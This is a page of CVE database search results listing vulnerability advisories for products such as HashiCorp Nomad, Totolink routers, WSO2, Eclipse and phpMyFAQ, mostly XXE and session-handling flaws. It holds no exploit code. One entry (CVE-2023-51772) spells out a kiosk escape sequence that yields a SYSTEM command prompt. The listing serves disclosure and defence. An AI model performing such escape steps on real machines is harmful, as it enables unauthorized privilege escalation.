Export limit exceeded: 45286 CVEs match your query. Please refine your search to export 10,000 CVEs or fewer.
Search
Search Results (2948 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2024-1329 | 1 Hashicorp | 1 Nomad | 2024-11-21 | 7.7 High |
| HashiCorp Nomad and Nomad Enterprise 1.5.13 up to 1.6.6, and 1.7.3 template renderer is vulnerable to arbitrary file write on the host as the Nomad client user through symlink attacks. This vulnerability, CVE-2024-1329, is fixed in Nomad 1.7.4, 1.6.7, and 1.5.14. | ||||
| CVE-2024-0943 | 1 Totolink | 2 N350rt, N350rt Firmware | 2024-11-21 | 3.7 Low |
| A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2024-0942 | 1 Totolink | 2 N200re-v5, N200re-v5 Firmware | 2024-11-21 | 3.7 Low |
| A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2023-6836 | 1 Wso2 | 7 Api Manager, Api Manager Analytics, Api Microgateway and 4 more | 2024-11-21 | 4.6 Medium |
| Multiple WSO2 products have been identified as vulnerable due to an XML External Entity (XXE) attack abuses a widely available but rarely used feature of XML parsers to access sensitive information. | ||||
| CVE-2023-6721 | 1 Europeana | 1 Repox | 2024-11-21 | 8.3 High |
| An XEE vulnerability has been found in Repox, which allows a remote attacker to interfere with the application's XML data processing in the fileupload function, resulting in interaction between the attacker and the server's file system. | ||||
| CVE-2023-6280 | 1 52north | 1 Wps | 2024-11-21 | 7.2 High |
| An XXE (XML External Entity) vulnerability has been detected in 52North WPS affecting versions prior to 4.0.0-beta.11. This vulnerability allows the use of external entities in its WebProcessingService servlet for an attacker to retrieve files by making HTTP requests to the internal network. | ||||
| CVE-2023-6194 | 1 Eclipse | 1 Memory Analyzer | 2024-11-21 | 2.8 Low |
| In Eclipse Memory Analyzer versions 0.7 to 1.14.0, report definition XML files are not filtered to prohibit document type definition (DTD) references to external entities. This means that if a user chooses to use a malicious report definition XML file containing an external entity reference to generate a report then Eclipse Memory Analyzer may access external files or URLs defined via a DTD in the report definition. | ||||
| CVE-2023-5889 | 1 Pkp | 1 Pkp Web Application Library | 2024-11-21 | 8.2 High |
| Insufficient Session Expiration in GitHub repository pkp/pkp-lib prior to 3.3.0-16. | ||||
| CVE-2023-5866 | 1 Phpmyfaq | 1 Phpmyfaq | 2024-11-21 | 5.7 Medium |
| Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository thorsten/phpmyfaq prior to 3.2.1. | ||||
| CVE-2023-5865 | 1 Phpmyfaq | 1 Phpmyfaq | 2024-11-21 | 9.8 Critical |
| Insufficient Session Expiration in GitHub repository thorsten/phpmyfaq prior to 3.2.2. | ||||
| CVE-2023-5838 | 1 Linkstack | 1 Linkstack | 2024-11-21 | 9.8 Critical |
| Insufficient Session Expiration in GitHub repository linkstackorg/linkstack prior to v4.2.9. | ||||
| CVE-2023-5035 | 1 Moxa | 2 Eds-g503, Eds-g503 Firmware | 2024-11-21 | 3.1 Low |
| A vulnerability has been identified in PT-G503 Series firmware versions prior to v5.2, where the Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the cookie to be transmitted in plaintext over an HTTP session. The vulnerability may lead to security risks, potentially exposing user session data to unauthorized access and manipulation. | ||||
| CVE-2023-52252 | 1 Unifiedremote | 1 Unified Remote | 2024-11-21 | 9.8 Critical |
| Unified Remote 3.13.0 allows remote attackers to execute arbitrary Lua code because of a wildcarded Access-Control-Allow-Origin for the Remote upload endpoint. | ||||
| CVE-2023-51772 | 1 Oneidentity | 1 Password Manager | 2024-11-21 | 8.8 High |
| One Identity Password Manager before 5.13.1 allows Kiosk Escape. This product enables users to reset their Active Directory passwords on the login screen of a Windows client. It launches a Chromium based browser in Kiosk mode to provide the reset functionality. The escape sequence is: wait for a session timeout, click on the Help icon, observe that there is a browser window for the One Identity website, navigate to any website that offers file upload, navigate to cmd.exe from the file explorer window, and launch cmd.exe as NT AUTHORITY\SYSTEM. | ||||
| CVE-2023-50936 | 1 Ibm | 1 Powersc | 2024-11-21 | 6.3 Medium |
| IBM PowerSC 1.3, 2.0, and 2.1 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 275116. | ||||
| CVE-2023-50304 | 1 Ibm | 2 Engineering Requirements Management Doors, Engineering Requirements Management Doors Web Access | 2024-11-21 | 7.1 High |
| IBM Engineering Requirements Management DOORS Web Access 9.7.2.8 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 273335. | ||||
| CVE-2023-4704 | 1 Instantcms | 1 Instantcms | 2024-11-21 | 4.9 Medium |
| External Control of System or Configuration Setting in GitHub repository instantsoft/icms2 prior to 2.16.1-git. | ||||
| CVE-2023-4654 | 1 Instantcms | 1 Instantcms | 2024-11-21 | 3.5 Low |
| Sensitive Cookie in HTTPS Session Without 'Secure' Attribute in GitHub repository instantsoft/icms2 prior to 2.16.1. | ||||
| CVE-2023-4560 | 1 Omeka | 1 Omeka S | 2024-11-21 | 6.5 Medium |
| Improper Authorization of Index Containing Sensitive Information in GitHub repository omeka/omeka-s prior to 4.0.4. | ||||
| CVE-2023-4218 | 1 Eclipse | 3 Eclipse Ide, Org.eclipse.core.runtime, Pde | 2024-11-21 | 5 Medium |
| In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch). | ||||